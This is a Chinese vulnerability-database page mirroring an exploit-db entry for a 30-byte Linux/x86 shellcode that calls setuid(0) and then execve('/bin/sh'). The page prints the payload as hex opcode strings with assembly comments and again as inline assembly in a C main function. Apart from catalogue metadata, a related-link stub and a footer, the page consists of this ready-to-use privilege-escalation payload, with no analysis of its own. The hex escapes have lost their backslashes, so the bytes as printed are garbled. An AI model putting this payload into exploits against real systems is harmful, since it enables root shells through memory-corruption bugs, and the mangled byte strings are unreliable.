Linux/x86 – execve(/bin/sh) Shellcode (30 bytes)-安全小百科

Linux/x86 – execve(/bin/sh) Shellcode (30 bytes)

漏洞ID	1054610	漏洞类型
发布时间	2004-09-12	更新时间	2004-09-12
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13446

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
[email protected]
20 de marzo de 2001


"x31xdb"                      // xorl         %ebx,%ebx
"x8dx43x17"                  // leal         0x17(%ebx),%eax
"xcdx80"                      // int          $0x80
"x31xd2"                      // xorl         %edx,%edx
"x52"                          // pushl        %edx
"x68x6ex2fx73x68"          // pushl        $0x68732f6e
"x68x2fx2fx62x69"          // pushl        $0x69622f2f
"x89xe3"                      // movl         %esp,%ebx
"x52"                          // pushl        %edx
"x53"                          // pushl        %ebx
"x89xe1"                      // movl         %esp,%ecx
"xb0x0b"                      // movb         $0xb,%al
"xcdx80";                     // int          $0x80

*/

void main() {
__asm__ ("
	xorl	%ebx, %ebx
	leal	0x17(%ebx),%eax
	int	$0x80				# here was cleared eax

	xorl	%edx, %edx
	pushl	%edx
	pushl	$0x68732f6e
	pushl	$0x69622f2f
	movl	%esp, %ebx
	pushl	%edx
	pushl	%ebx
	movl	%esp, %ecx
	movb	$0xb, %al			# and makeuof here
	int	$0x80
	");
}

// milw0rm.com [2004-09-12]

相关推荐: Mambo Site Server 4.0.14 – ‘contact.php’ Unauthorized Mail Relay

Mambo Site Server 4.0.14 – ‘contact.php’ Unauthorized Mail Relay 漏洞ID 1054172 漏洞类型发布时间 2003-09-18 更新时间 2003-09-18 CVE编号 N/A CNNVD…

文章版权归作者所有，未经允许请勿转载。

THE END